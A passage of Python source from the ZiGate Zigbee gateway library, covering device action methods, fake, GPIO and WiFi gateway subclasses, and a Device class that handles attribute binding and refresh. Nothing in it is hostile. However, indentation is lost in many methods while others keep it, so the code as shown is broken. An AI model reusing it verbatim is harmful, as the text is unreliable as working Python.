    addr = self.__addr(addr)
    data = struct.pack('!B' + addr_fmt + 'BBHHH', addr_mode, addr, 1, endpoint,
                       x, y, transition)
    return self.send_data(0x00B7, data)
@register_actions(ACTIONS_COLOR)
def action_move_colour_hex(self, addr, endpoint, color_hex, transition=1):
'''
move to colour #ffffff
convenient function to set color in hex format
transition in second
'''
x, y = hex_to_xy(color_hex)
return self.action_move_colour(addr, endpoint, x, y, transition)
@register_actions(ACTIONS_COLOR)
def action_move_colour_rgb(self, addr, endpoint, rgb, transition=1):
'''
move to colour (r,g,b) example : (1.0, 1.0, 1.0)
convenient function to set color in hex format
transition in second
'''
x, y = rgb_to_xy(rgb)
return self.action_move_colour(addr, endpoint, x, y, transition)
@register_actions(ACTIONS_TEMPERATURE)
def action_move_temperature(self, addr, endpoint, mired, transition=1):
'''
move colour to temperature
mired color temperature
transition in second
'''
addr = self._translate_addr(addr)
addr_mode, addr_fmt = self._choose_addr_mode(addr)
addr = self.__addr(addr)
data = struct.pack('!B' + addr_fmt + 'BBHH', addr_mode, addr, 1, endpoint,
mired, transition)
return self.send_data(0x00C0, data)
@register_actions(ACTIONS_TEMPERATURE)
def action_move_temperature_kelvin(self, addr, endpoint, temperature, transition=1):
'''
move colour to temperature
temperature unit is kelvin
transition in second
convenient function to use kelvin instead of mired
'''
temperature = int(1000000 // temperature)
return self.action_move_temperature(addr, endpoint, temperature, transition)
@register_actions(ACTIONS_TEMPERATURE)
def action_move_temperature_rate(self, addr, endpoint, mode, rate, min_mired, max_mired):
'''
move colour temperature in specified rate towards given min or max value
Available modes:
- 0: Stop
- 1: Increase
- 3: Decrease
rate: how many temperature units are moved in one second
min_mired: Minium temperature where decreasing stops in mired
max_mired: Maxium temperature where increasing stops in mired
'''
addr = self._translate_addr(addr)
addr_mode, addr_fmt = self._choose_addr_mode(addr)
addr = self.__addr(addr)
data = struct.pack('!B' + addr_fmt + 'BBBHHH', addr_mode, addr, 1, endpoint, mode, rate, min_mired, max_mired)
return self.send_data(0x00C1, data)
@register_actions(ACTIONS_LOCK)
def action_lock(self, addr, endpoint, lock):
'''
Lock / unlock
'''
addr = self._translate_addr(addr)
addr_mode, addr_fmt = self._choose_addr_mode(addr)
addr = self.__addr(addr)
data = struct.pack('!B' + addr_fmt + 'BBB', addr_mode, addr, 1, endpoint, lock)
return self.send_data(0x00f0, data)
@register_actions(ACTIONS_COVER)
def action_cover(self, addr, endpoint, cmd, param=None):
'''
Open, close, move, ...
cmd could be :
OPEN = 0x00
CLOSE = 0x01
STOP = 0x02
LIFT_VALUE = 0x04
LIFT_PERCENT = 0x05
TILT_VALUE = 0x07
TILT_PERCENT = 0x08
'''
addr = self._translate_addr(addr)
addr_mode, addr_fmt = self._choose_addr_mode(addr)
fmt = '!B' + addr_fmt + 'BBB'
addr = self.__addr(addr)
args = [addr_mode, addr, 1, endpoint, cmd]
if cmd in (0x04, 0x07):
fmt += 'H'
args.append(param)
elif cmd in (0x05, 0x08):
fmt += 'B'
args.append(param)
data = struct.pack(fmt, *args)
return self.send_data(0x00fa, data)
@register_actions(ACTIONS_IAS)
def action_ias_warning(self, addr, endpoint,
mode='burglar', strobe=True, level='low',
duration=60, strobe_cycle=10, strobe_level='low',
direction=0, manufacturer_code=0):
'''
mode: stop, burglar, fire, emergency, policepanic, firepanic, emergencypanic
duration: seconds
level: low, medium, high, veryhigh
strobe_cycle: duty-cycle of the strobe pulse, expressed as a percentage in 10% steps
strobe_level: level of the strobe (pulse) low, medium, high, veryhigh
'''
addr = self._translate_addr(addr)
addr_mode, addr_fmt = self._choose_addr_mode(addr)
addr = self.__addr(addr)
manufacturer_specific = manufacturer_code != 0
mode = {'stop': '0000', 'burglar': '0001', 'fire': '0010', 'emergency': '0011',
'policepanic': '0100', 'firepanic': '0101', 'emergencypanic': '0110'
}.get(mode, '0000')
strobe = '01' if strobe else '00'
level = {'low': '00', 'medium': '01', 'high': '10', 'veryhigh': '11'}.get(level, '00')
warning_mode_strobe_level = int(mode + strobe + level, 2)
strobe_level = {'low': 0, 'medium': 1, 'high': 2, 'veryhigh': 3}.get(strobe_level, 0)
data = struct.pack('!B' + addr_fmt + 'BBBBHBHBB', addr_mode, addr, 1,
endpoint,
direction, manufacturer_specific, manufacturer_code,
warning_mode_strobe_level, duration, strobe_cycle, strobe_level)
self.send_data(0x0111, data)
@register_actions(ACTIONS_IAS)
def action_ias_squawk(self, addr, endpoint,
mode='armed',
strobe=True,
level='low',
direction=0, manufacturer_code=0):
'''
mode: armed or disarmed
strobe: True or False
level: low, medium, high, veryhigh
'''
addr = self._translate_addr(addr)
addr_mode, addr_fmt = self._choose_addr_mode(addr)
addr = self.__addr(addr)
manufacturer_specific = manufacturer_code != 0
mode = {'armed': '0000', 'disarmed': '1000'}.get(mode, '0000')
strobe = '1' if strobe else '0'
level = {'low': '00', 'medium': '01', 'high': '10', 'veryhigh': '11'}.get(level, '00')
squawk_mode_strobe_level = int(mode + strobe + '0' + level, 2)
data = struct.pack('!B' + addr_fmt + 'BBBBHB', addr_mode, addr, 1,
endpoint,
direction, manufacturer_specific, manufacturer_code,
squawk_mode_strobe_level)
self.send_data(0x0112, data)
@register_actions(ACTIONS_THERMOSTAT)
def action_thermostat_occupied_heating_setpoint(self, addr, endpoint, temperature,
direction=0, manufacturer_code=0):
"""
Convenient function to set heating temperature on thermostat
"""
return self.write_attribute_request(addr, endpoint, 0x0201,
(0x0012, 0x29, temperature * 100),
direction, manufacturer_code)
@register_actions(ACTIONS_THERMOSTAT)
def action_thermostat_system_mode(self, addr, endpoint, mode, direction=0, manufacturer_code=0):
"""
Convenient function to set thermostat mode
mode :
'off': 0x00,
'auto': 0x01,
'cool': 0x03,
'heat': 0x04,
'emergency_heat': 0x05,
'precooling': 0x06,
'fan': 0x07
"""
modes = {'off': 0x00,
'auto': 0x01,
'cool': 0x03,
'heat': 0x04,
'emergency_heat': 0x05,
'precooling': 0x06,
'fan': 0x07}
mode = modes.get(mode, mode)
if mode == 0x03:
self.write_attribute_request(addr, endpoint, 0x0201,
(0x001B, 0x30, 0),
direction, manufacturer_code)
elif mode == 0x04:
self.write_attribute_request(addr, endpoint, 0x0201,
(0x001B, 0x30, 2),
direction, manufacturer_code)
return self.write_attribute_request(addr, endpoint, 0x0201,
(0x001C, 0x30, mode),
direction, manufacturer_code)
def raw_aps_data_request(self, addr, src_ep, dst_ep, profile, cluster, payload, addr_mode=2, security=0):
'''
Send raw APS Data request
'''
addr = self.__addr(addr)
length = len(payload)
radius = 0
data = struct.pack('!BHBBHHBBB{}s'.format(length), addr_mode, addr, src_ep, dst_ep,
cluster, profile, security, radius, length, payload)
return self.send_data(0x0530, data)
def set_TX_power(self, percent=100):
'''
Set TX Power between 0-100%
'''
percent = percent * 255 // 100
data = struct.pack('!B', percent)
return self.send_data(0x0806, data)
def get_TX_power(self):
'''
Get TX Power
'''
return self.send_data(0x0807, wait_response=0x8807)
def start_mqtt_broker(self, host='localhost:1883', username=None, password=None):
'''
Start a MQTT broker in a new thread
'''
from .mqtt_broker import MQTT_Broker
broker = MQTT_Broker(self, host, username, password)
broker.connect()
self.broker_thread = threading.Thread(target=broker.client.loop_forever,
name='ZiGate-MQTT')
self.broker_thread.setDaemon(True)
self.broker_thread.start()
def generate_templates(self, dirname='~'):
'''
Generate template file for each device
'''
for device in self._devices.values():
device.generate_template(dirname)
class FakeZiGate(ZiGate):
    '''
    Fake ZiGate for test only without real hardware.

    Pre-loads a fake xiaomi temperature sensor (lumi.weather) on
    address 'abcd' so higher layers have a device to talk to.
    '''

    def __init__(self, port='auto', path='~/.zigate.json',
                 auto_start=False, auto_save=False, channel=None, adminpanel=False):
        ZiGate.__init__(self, port=port, path=path, auto_start=auto_start, auto_save=auto_save,
                        channel=channel, adminpanel=adminpanel)
        # fixed coordinator identity
        self._addr = '0000'
        self._ieee = 'fedcba9876543210'
        # by default add a fake xiaomi temp sensor on address abcd
        device = Device({'addr': 'abcd', 'ieee': '0123456789abcdef'}, self)
        device.set_attribute(1, 0, {'attribute': 5, 'lqi': 170, 'data': 'lumi.weather'})
        device.load_template()
        self._devices['abcd'] = device
        self._neighbours_table_cache = [['0000', 'abcd', 255]]

    def startup(self, channel=None):
        # start normally, then let the fake transport emit canned responses
        ZiGate.startup(self, channel=channel)
        self.connection.start_fake_response()

    def setup_connection(self):
        # no serial port: use the in-memory fake transport
        self.connection = FakeTransport()
class ZiGateGPIO(ZiGate):
    """ZiGate hat driven through Raspberry Pi GPIO pins (PiZiGate)."""

    def __init__(self, port='auto', path='~/.zigate.json',
                 auto_start=True,
                 auto_save=True,
                 channel=None,
                 adminpanel=False):
        # GPIO27 selects run (HIGH) vs bootloader (LOW) mode; GPIO17 is
        # pulsed low then high — presumably the module reset line
        GPIO.setmode(GPIO.BCM)
        GPIO.setup(27, GPIO.OUT)  # GPIO2
        self.set_running_mode()
        ZiGate.__init__(self, port=port, path=path, auto_start=auto_start,
                        auto_save=auto_save, channel=channel, adminpanel=adminpanel)
        self._model = 'GPIO'

    def set_running_mode(self):
        """Reset the module into normal running mode."""
        GPIO.output(27, GPIO.HIGH)  # GPIO2
        GPIO.setup(17, GPIO.IN, pull_up_down=GPIO.PUD_DOWN)  # GPIO0
        sleep(0.5)
        GPIO.setup(17, GPIO.IN, pull_up_down=GPIO.PUD_UP)  # GPIO0
        sleep(0.5)

    def set_bootloader_mode(self):
        """Reset the module into bootloader mode (used for flashing)."""
        GPIO.output(27, GPIO.LOW)  # GPIO2
        GPIO.setup(17, GPIO.IN, pull_up_down=GPIO.PUD_DOWN)  # GPIO0
        sleep(0.5)
        GPIO.setup(17, GPIO.IN, pull_up_down=GPIO.PUD_UP)  # GPIO0
        sleep(0.5)

    def flash_firmware(self, path, erase_eeprom=False):
        """Flash the firmware at *path*, optionally erasing the EEPROM first."""
        from .flasher import flash
        self.set_bootloader_mode()
        flash(self._port, write=path, erase=erase_eeprom)
        self.set_running_mode()

    def __del__(self):
        # release the GPIO pins before the base cleanup
        GPIO.cleanup()
        ZiGate.__del__(self)

    def setup_connection(self):
        # '3f201' is passed as the serial connection's third parameter —
        # see ThreadSerialConnection for its meaning
        self.connection = ThreadSerialConnection(self, self._port, '3f201')
class ZiGateWiFi(ZiGate):
    """ZiGate coordinator reached over the network instead of a serial port."""

    def __init__(self, host, port=None, path='~/.zigate.json',
                 auto_start=True,
                 auto_save=True,
                 channel=None,
                 adminpanel=False):
        self._host = host
        ZiGate.__init__(self, port=port, path=path,
                        auto_start=auto_start,
                        auto_save=auto_save,
                        channel=channel,
                        adminpanel=adminpanel
                        )
        self._model = 'WiFi'

    def setup_connection(self):
        """Connect through a socket to the ZiGate WiFi module."""
        self.connection = ThreadSocketConnection(self, self._host, self._port)

    def reboot(self):
        '''
        ask zigate wifi to reboot
        '''
        import requests
        requests.get('http://{}/reboot'.format(self._host))
class DeviceEncoder(json.JSONEncoder):
    """JSON encoder aware of zigate objects (Device, Cluster, Response...)."""

    def default(self, obj):
        if isinstance(obj, (Device, Cluster)):
            return obj.to_json()
        if isinstance(obj, Response):
            return obj.cleaned_data()
        if isinstance(obj, bytes):
            return hexlify(obj).decode()
        if isinstance(obj, set):
            return list(obj)
        if isinstance(obj, type):
            return obj.__name__
        return json.JSONEncoder.default(self, obj)
class Device(object):
def __init__(self, info=None, zigate_instance=None):
self._zigate = zigate_instance
self._lock = threading.Lock()
self.info = info or {}
self.endpoints = {}
self._expire_timer = {}
self._fast_change = {}
self.missing = False
self.genericType = ''
self.discovery = ''
self.name = ''
def _lock_acquire(self):
LOGGER.debug('Acquire Lock on device %s', self)
r = self._lock.acquire(True, 5)
if not r:
LOGGER.error('Failed to acquire Lock on device %s', self)
def _lock_release(self):
LOGGER.debug('Release Lock on device %s', self)
if not self._lock.locked():
LOGGER.error('Device Lock not locked for device %s !', self)
else:
self._lock.release()
    def available_actions(self, endpoint_id=None):
        '''
        Analyse specified endpoint to found available actions.

        Actions are the ACTIONS_* groups:
        - onoff
        - move
        - lock
        - ...
        Returns {endpoint_id: [action groups]} for the requested
        endpoint(s), all endpoints by default.
        '''
        actions = {}
        if not endpoint_id:
            endpoint_id = list(self.endpoints.keys())
        if not isinstance(endpoint_id, list):
            endpoint_id = [endpoint_id]
        for ep_id in endpoint_id:
            actions[ep_id] = []
            endpoint = self.endpoints.get(ep_id)
            if endpoint:
                # some light have device=0 so try to work around
                if endpoint['device'] in ACTUATORS or (endpoint['device'] == 0 and self.receiver_on_when_idle()):
                    if 0x0006 in endpoint['in_clusters']:
                        actions[ep_id].append(ACTIONS_ONOFF)
                    if 0x0008 in endpoint['in_clusters'] and endpoint['device'] != 0x010a:
                        # except device 0x010a because Tradfri Outlet don't have level control
                        # but still have endpoint 8...
                        actions[ep_id].append(ACTIONS_LEVEL)
                    if 0x0101 in endpoint['in_clusters'] and self.receiver_on_when_idle():
                        # because of xiaomi vibration sensor
                        actions[ep_id].append(ACTIONS_LOCK)
                    if 0x0102 in endpoint['in_clusters']:
                        actions[ep_id].append(ACTIONS_COVER)
                    if 0x0201 in endpoint['in_clusters']:
                        actions[ep_id].append(ACTIONS_THERMOSTAT)
                    if 0x0300 in endpoint['in_clusters']:
                        # colour capabilities depend on the device id
                        # if endpoint['device'] in (0x0102, 0x0105):
                        if endpoint['device'] in (0x0105,):
                            actions[ep_id].append(ACTIONS_HUE)
                        elif endpoint['device'] in (0x010D, 0x0210):
                            actions[ep_id].append(ACTIONS_COLOR)
                            actions[ep_id].append(ACTIONS_HUE)
                            actions[ep_id].append(ACTIONS_TEMPERATURE)
                        elif endpoint['device'] in (0x0102, 0x010C, 0x0220):
                            actions[ep_id].append(ACTIONS_TEMPERATURE)
                        else:  # 0x0200
                            actions[ep_id].append(ACTIONS_COLOR)
                            actions[ep_id].append(ACTIONS_HUE)
                    if 0x0502 in endpoint['in_clusters']:
                        actions[ep_id].append(ACTIONS_IAS)
        return actions
def _create_actions(self):
'''
create convenient functions for actions
'''
a_actions = self.available_actions()
for endpoint_id, actions in a_actions.items():
for action in actions:
for func_name in ACTIONS.get(action, []):
func = getattr(self._zigate, func_name)
wfunc = functools.partial(func, self.addr, endpoint_id)
functools.update_wrapper(wfunc, func)
setattr(self, func_name, wfunc)
    def _bind_report(self, enpoint_id=None):
        '''
        Automatically bind and configure attribute reporting for the
        well-known clusters of this device.

        enpoint_id [sic — name kept for compatibility]: restrict the
        process to one endpoint; default is every known endpoint.
        Does nothing when the global BIND_REPORT switch is off.
        '''
        if not BIND_REPORT:
            return
        if enpoint_id:
            endpoints_list = [(enpoint_id, self.endpoints[enpoint_id])]
        else:
            endpoints_list = list(self.endpoints.items())
        LOGGER.debug('Start automagic bind and report process for device %s', self)
        for endpoint_id, endpoint in endpoints_list:
            # if endpoint['device'] in ACTUATORS:  # light
            LOGGER.debug('Bind and report endpoint %s for device %s', endpoint_id, self)
            if 0x0001 in endpoint['in_clusters']:
                # power configuration (battery voltage / percentage)
                LOGGER.debug('bind and report for cluster 0x0001')
                self._zigate.bind_addr(self.addr, endpoint_id, 0x0001)
                self._zigate.reporting_request(self.addr, endpoint_id,
                                               0x0001, (0x0020, 0x20))
                self._zigate.reporting_request(self.addr, endpoint_id,
                                               0x0001, (0x0021, 0x20))
            if 0x0006 in endpoint['in_clusters']:
                # on/off state
                LOGGER.debug('bind and report for cluster 0x0006')
                self._zigate.bind_addr(self.addr, endpoint_id, 0x0006)
                self._zigate.reporting_request(self.addr, endpoint_id,
                                               0x0006, (0x0000, 0x10))
            if 0x0008 in endpoint['in_clusters']:
                # current level
                LOGGER.debug('bind and report for cluster 0x0008')
                self._zigate.bind_addr(self.addr, endpoint_id, 0x0008)
                self._zigate.reporting_request(self.addr, endpoint_id,
                                               0x0008, (0x0000, 0x20))
            if 0x0009 in endpoint['in_clusters']:
                # bind only, no reporting configured for this cluster
                LOGGER.debug('bind and report for cluster 0x0009')
                self._zigate.bind_addr(self.addr, endpoint_id, 0x0009)
            if 0x000f in endpoint['in_clusters']:
                # binary input present value
                LOGGER.debug('bind and report for cluster 0x000f')
                self._zigate.bind_addr(self.addr, endpoint_id, 0x000f)
                self._zigate.reporting_request(self.addr, endpoint_id,
                                               0x000f, (0x0055, 0x10))
            if 0x0101 in endpoint['in_clusters']:
                LOGGER.debug('bind and report for cluster 0x0101')
                self._zigate.bind_addr(self.addr, endpoint_id, 0x0101)
                self._zigate.reporting_request(self.addr, endpoint_id,
                                               0x0101, (0x0000, 0x30))
            if 0x0102 in endpoint['in_clusters']:
                # window covering position
                LOGGER.debug('bind and report for cluster 0x0102')
                self._zigate.bind_addr(self.addr, endpoint_id, 0x0102)
                self._zigate.reporting_request(self.addr, endpoint_id,
                                               0x0102, (0x0007, 0x20))
            if 0x0201 in endpoint['in_clusters']:
                # thermostat: temperatures, setpoints and system mode
                LOGGER.debug('bind and report for cluster 0x0201')
                self._zigate.bind_addr(self.addr, endpoint_id, 0x0201)
                self._zigate.reporting_request(self.addr, endpoint_id,
                                               0x0201, (0x0000, 0x29))
                self._zigate.reporting_request(self.addr, endpoint_id,
                                               0x0201, (0x0002, 0x18))
                self._zigate.reporting_request(self.addr, endpoint_id,
                                               0x0201, (0x0008, 0x20))
                self._zigate.reporting_request(self.addr, endpoint_id,
                                               0x0201, (0x0012, 0x29))
                self._zigate.reporting_request(self.addr, endpoint_id,
                                               0x0201, (0x0014, 0x29))
                self._zigate.reporting_request(self.addr, endpoint_id,
                                               0x0201, (0x001C, 0x30))
            if 0x0300 in endpoint['in_clusters']:
                # colour control: the attributes to report depend on the
                # device id (hue/sat, xy, colour temperature)
                LOGGER.debug('bind and report for cluster 0x0300')
                self._zigate.bind_addr(self.addr, endpoint_id, 0x0300)
                if endpoint['device'] in (0x0105,):
                    self._zigate.reporting_request(self.addr,
                                                   endpoint_id,
                                                   0x0300, (0x0000, 0x20))
                    self._zigate.reporting_request(self.addr,
                                                   endpoint_id,
                                                   0x0300, (0x0001, 0x20))
                elif endpoint['device'] in (0x010D, 0x0210):
                    # self._zigate.reporting_request(self.addr,
                    #                                endpoint_id,
                    #                                0x0300, [(0x0000, 0x20),
                    #                                         (0x0001, 0x20),
                    #                                         (0x0003, 0x21),
                    #                                         (0x0004, 0x21),
                    #                                         (0x0007, 0x21),
                    #                                         ])
                    self._zigate.reporting_request(self.addr,
                                                   endpoint_id,
                                                   0x0300, (0x0000, 0x20))
                    self._zigate.reporting_request(self.addr,
                                                   endpoint_id,
                                                   0x0300, (0x0001, 0x20))
                    self._zigate.reporting_request(self.addr,
                                                   endpoint_id,
                                                   0x0300, (0x0003, 0x21))
                    self._zigate.reporting_request(self.addr,
                                                   endpoint_id,
                                                   0x0300, (0x0004, 0x21))
                    self._zigate.reporting_request(self.addr,
                                                   endpoint_id,
                                                   0x0300, (0x0007, 0x21))
                elif endpoint['device'] in (0x0102, 0x010C, 0x0220):
                    self._zigate.reporting_request(self.addr,
                                                   endpoint_id,
                                                   0x0300, (0x0007, 0x21))
                else:  # 0x0200
                    # self._zigate.reporting_request(self.addr,
                    #                                endpoint_id,
                    #                                0x0300, [(0x0000, 0x20),
                    #                                         (0x0001, 0x20),
                    #                                         (0x0003, 0x21),
                    #                                         (0x0004, 0x21),
                    #                                         ])
                    self._zigate.reporting_request(self.addr,
                                                   endpoint_id,
                                                   0x0300, (0x0000, 0x20))
                    self._zigate.reporting_request(self.addr,
                                                   endpoint_id,
                                                   0x0300, (0x0001, 0x20))
                    self._zigate.reporting_request(self.addr,
                                                   endpoint_id,
                                                   0x0300, (0x0003, 0x21))
                    self._zigate.reporting_request(self.addr,
                                                   endpoint_id,
                                                   0x0300, (0x0004, 0x21))
            if 0x0400 in endpoint['in_clusters']:
                LOGGER.debug('bind for cluster 0x0400')
                self._zigate.bind_addr(self.addr, endpoint_id, 0x0400)
            if 0xFC00 in endpoint['in_clusters']:
                LOGGER.debug('bind for cluster 0xFC00')
                self._zigate.bind_addr(self.addr, endpoint_id, 0xFC00)
            if 0x0702 in endpoint['in_clusters']:
                # metering
                LOGGER.debug('bind for cluster 0x0702')
                self._zigate.bind_addr(self.addr, endpoint_id, 0x0702)
                self._zigate.reporting_request(self.addr,
                                               endpoint_id,
                                               0x0702, (0x0000, 0x25))
    @staticmethod
    def from_json(data, zigate_instance=None):
        """
        Rebuild a Device from its JSON dict (see to_json), converting
        several legacy storage formats on the fly.
        """
        d = Device(zigate_instance=zigate_instance)
        d.info = data.get('info', {})
        d.genericType = data.get('generictype', '')
        d.discovery = data.get('discovery', '')
        d.name = data.get('name', '')
        for ep in data.get('endpoints', []):
            if 'attributes' in ep:  # old version
                LOGGER.debug('Old version found, convert it')
                for attribute in ep['attributes'].values():
                    endpoint_id = attribute['endpoint']
                    cluster_id = attribute['cluster']
                    data = {'attribute': attribute['attribute'],
                            'data': attribute['data'],
                            }
                    d.set_attribute(endpoint_id, cluster_id, data)
            else:
                endpoint = d.get_endpoint(ep['endpoint'])
                endpoint['profile'] = ep.get('profile', 0)
                endpoint['device'] = ep.get('device', 0)
                endpoint['in_clusters'] = ep.get('in_clusters', [])
                endpoint['out_clusters'] = ep.get('out_clusters', [])
                for cl in ep['clusters']:
                    cluster = Cluster.from_json(cl, endpoint, d)
                    endpoint['clusters'][cluster.cluster_id] = cluster
        # migrate info keys renamed in newer releases
        if 'power_source' in d.info:  # old version
            d.info['power_type'] = d.info.pop('power_source')
        if 'manufacturer' in d.info:  # old version
            d.info['manufacturer_code'] = d.info.pop('manufacturer')
        if 'rssi' in d.info:  # old version
            d.info['lqi'] = d.info.pop('rssi')
        d._avoid_duplicate()
        return d
def to_json(self, properties=False):
r = {'addr': self.addr,
'info': self.info,
'endpoints': [{'endpoint': k,
'clusters': list(v['clusters'].values()),
'profile': v['profile'],
'device': v['device'],
'in_clusters': v['in_clusters'],
'out_clusters': v['out_clusters']
} for k, v in self.endpoints.items()],
'generictype': self.genericType,
'discovery': self.discovery,
'name': self.name
}
if properties:
r['properties'] = list(self.properties)
return r
def __str__(self):
if self.name:
return self.name
name = self.get_property_value('type', '')
manufacturer = self.get_property_value('manufacturer', 'Device')
return '{} {} ({}) {}'.format(manufacturer, name, self.info.get('addr'), self.info.get('ieee'))
def __repr__(self):
return self.__str__()
@property
def addr(self):
return self.info['addr']
@property
def ieee(self):
ieee = self.info.get('ieee')
if ieee is None:
LOGGER.error('IEEE is missing for %s, please pair it again !', self.addr)
return ieee
@property
def rssi(self): # compat
return self.lqi
@rssi.setter
def rssi(self, value): # compat
self.lqi = value
@property
def lqi(self):
return self.info.get('lqi', 0)
@lqi.setter
def lqi(self, value):
self.info['lqi'] = value
@property
def last_seen(self):
return self.info.get('last_seen')
    @property
    def battery_percent(self):
        """
        Best-effort battery charge estimate in percent, capped at 100.

        Uses the reported battery_percent attribute when present;
        otherwise, for power_type == 0 devices, interpolates
        battery_voltage between an assumed empty level (91% of the
        nominal power_source voltage) and the nominal voltage.  A
        power_source of 3 is treated as a 3.1V battery.
        """
        percent = self.get_property_value('battery_percent')
        if not percent:
            percent = 100
            if self.info.get('power_type') == 0:
                power_source = self.get_property_value('power_source')
                if power_source is None:
                    power_source = 3
                battery_voltage = self.get_property_value('battery_voltage')
                if power_source == 3:  # battery
                    power_source = 3.1
                if power_source and battery_voltage:
                    # linear interpolation between the assumed empty
                    # voltage (0.91 * nominal) and the nominal voltage
                    power_end = 0.91 * power_source
                    percent = (battery_voltage - power_end) * 100 / (power_source - power_end)
        if percent > 100:
            percent = 100
        return percent
@property
def rssi_percent(self): # compat
return self.lqi_percent
@property
def lqi_percent(self):
return round(100 * self.lqi / 255)
    def get_type(self, wait=True):
        '''
        Return the device type string (e.g. 'lumi.weather').

        When unknown, request attributes 0x0004/0x0005 of the basic
        cluster (0x0000) on the device endpoints; with wait=True the
        call blocks (up to WAIT_TIMEOUT seconds) until the answer
        arrives, otherwise it returns None immediately.
        '''
        typ = self.get_value('type')
        if typ is None:
            for endpoint in self.endpoints:
                # query endpoints that expose the basic cluster, or whose
                # in_clusters are still unknown
                if 0 in self.endpoints[endpoint]['in_clusters'] or not self.endpoints[endpoint]['in_clusters']:
                    self._zigate.read_attribute_request(self.addr,
                                                        endpoint,
                                                        0x0000,
                                                        [0x0004, 0x0005]
                                                        )
                if 0 in self.endpoints[endpoint]['in_clusters']:
                    break
            if not wait or not self.endpoints:
                return
            # wait for type
            t1 = monotonic()
            while self.get_value('type') is None:
                sleep(0.01)
                t2 = monotonic()
                if t2 - t1 > WAIT_TIMEOUT:
                    LOGGER.warning('No response waiting for type')
                    return
            typ = self.get_value('type')
        return typ
    def refresh_device(self, full=False, force=False):
        '''
        Re-read the interesting attributes of the device.

        full: read back every already-known attribute instead of the
        per-cluster shortlist below.
        force: refresh even when the device was seen less than an hour
        ago.
        '''
        to_read = {}  # (endpoint_id, cluster_id) -> [attribute ids]
        if not force:
            last_1h = datetime.datetime.now() - datetime.timedelta(hours=1)
            last_1h = last_1h.strftime('%Y-%m-%d %H:%M:%S')
            # last_seen uses the same string format, so lexicographic
            # comparison matches chronological order
            if self.last_seen and self.last_seen > last_1h:
                LOGGER.debug('Last seen less than an hour, ignoring refresh')
                return
        if full:
            for attribute in self.attributes:
                k = (attribute['endpoint'], attribute['cluster'])
                if k not in to_read:
                    to_read[k] = []
                to_read[k].append(attribute['attribute'])
        else:
            endpoints_list = list(self.endpoints.items())
            for endpoint_id, endpoint in endpoints_list:
                # tries to read the type as a kind of ping
                if 0x0000 in endpoint['in_clusters']:
                    k = (endpoint_id, 0x0000)
                    if k not in to_read:
                        to_read[k] = []
                    to_read[k].append(0x0005)
                if 0x0006 in endpoint['in_clusters']:
                    k = (endpoint_id, 0x0006)
                    if k not in to_read:
                        to_read[k] = []
                    to_read[k].append(0x0000)
                if 0x0008 in endpoint['in_clusters']:
                    k = (endpoint_id, 0x0008)
                    if k not in to_read:
                        to_read[k] = []
                    to_read[k].append(0x0000)
                if 0x000f in endpoint['in_clusters']:
                    k = (endpoint_id, 0x000f)
                    if k not in to_read:
                        to_read[k] = []
                    to_read[k].append(0x0055)
                if 0x0102 in endpoint['in_clusters']:
                    k = (endpoint_id, 0x0102)
                    if k not in to_read:
                        to_read[k] = []
                    to_read[k].append(0x0007)
                if 0x0201 in endpoint['in_clusters']:
                    # thermostat: temperatures, setpoints and system mode
                    k = (endpoint_id, 0x0201)
                    if k not in to_read:
                        to_read[k] = []
                    to_read[k].append(0x0000)
                    to_read[k].append(0x0002)
                    to_read[k].append(0x0008)
                    to_read[k].append(0x0012)
                    to_read[k].append(0x0014)
                    to_read[k].append(0x001C)
                if 0x0300 in endpoint['in_clusters']:
                    # colour control: the attribute set depends on the
                    # device id (same split as _bind_report)
                    k = (endpoint_id, 0x0300)
                    if k not in to_read:
                        to_read[k] = []
                    self._zigate.bind_addr(self.addr, endpoint_id, 0x0300)
                    if endpoint['device'] in (0x0105,):
                        to_read[k].append(0x0000)
                        to_read[k].append(0x0001)
                    elif endpoint['device'] in (0x010D, 0x0210):
                        to_read[k].append(0x0000)
                        to_read[k].append(0x0001)
                        to_read[k].append(0x0003)
                        to_read[k].append(0x0004)
                        to_read[k].append(0x0007)
                    elif endpoint['device'] in (0x0102, 0x010C, 0x0220):
                        to_read[k].append(0x0007)
                    else:  # 0x0200
                        to_read[k].append(0x0000)
                        to_read[k].append(0x0001)
                        to_read[k].append(0x0003)
                        to_read[k].append(0x0004)
                if 0x0702 in endpoint['in_clusters']:
                    k = (endpoint_id, 0x0702)
                    if k not in to_read:
                        to_read[k] = []
                    to_read[k].append(0x0000)
        # issue one read request per (endpoint, cluster) pair
        for k, attributes in to_read.items():
            endpoint, cluster = k
            self._zigate.read_attribute_request(self.addr,
                                                endpoint,
                                                cluster,
                                                attributes)
def discover_device(self):
self._zigate.discover_device(self.addr)
def identify_device(self, time_sec=5):
'''
send identify command
sec is time in second
'''
ep = list(self.endpoints.keys())
ep.sort()
if ep:
endpoint = ep[0]
else:
endpoint = 1
self._zigate.identify_send(self.addr, endpoint, time_sec)
def __setitem__(self, key, value):
self.info[key] = value
def __getitem__(self, key):
return self.info[key]
def __delitem__(self, key):
return self.info.__delitem__(key)
def get(self, key, default):
return self.info.get(key, default)
def __contains__(self, key):
return self.info.__contains__(key)
def __len__(self):
return len(self.info)
def __iter__(self):
return self.info.__iter__()
def items(self):
return self.info.items()
def keys(self):
return self.info.keys()
# def __getattr__(self, attr):
# return self.info[attr]
def update(self, device):
'''
update from other device
'''
self._lock_acquire()
self.info.update(device.info)
self._merge_endpoints(device.endpoints)
self.genericType = self.genericType or device.genericType
# self.info['last_seen'] = strftime('%Y-%m-%d %H:%M:%S')
self._lock_release()
def _merge_endpoints(self, endpoints):
for endpoint_id, endpoint in endpoints.items():
if endpoint_id not in self.endpoints:
self.endpoints[endpoint_id] = endpoint
else:
myendpoint = self.endpoints[endpoint_id]
if 'clusters' not in myendpoint:
myendpoint['clusters'] = {}
myendpoint['profile'] = endpoint.get('profile') or myendpoint.get('profile', 0)
myendpoint['device'] = endpoint.get('device') or myendpoint.get('device', 0)
myendpoint['in_clusters'] = endpoint.get('in_clusters') or myendpoint.get('in_clusters', [])
myendpoint['out_clusters'] = endpoint.get('out_clusters') or myendpoint.get('out_clusters', [])
for cluster_id, cluster in endpoint['clusters'].items():
if cluster_id not in myendpoint['clusters']:
myendpoint['clusters'][cluster_id] = cluster
else:
mycluster = myendpoint['clusters'][cluster_id]
for attribute in cluster.attributes.values():
mycluster.update(attribute)
def update_info(self, info):
self._lock_acquire()
self.info.update(info)
self._lock_release()
def get_endpoint(self, endpoint_id):
self._lock_acquire()
if endpoint_id not in self.endpoints:
self.endpoints[endpoint_id] = {'clusters': {},
'profile': 0,
'device': 0,
'in_clusters': [],
'out_clusters': [],
}
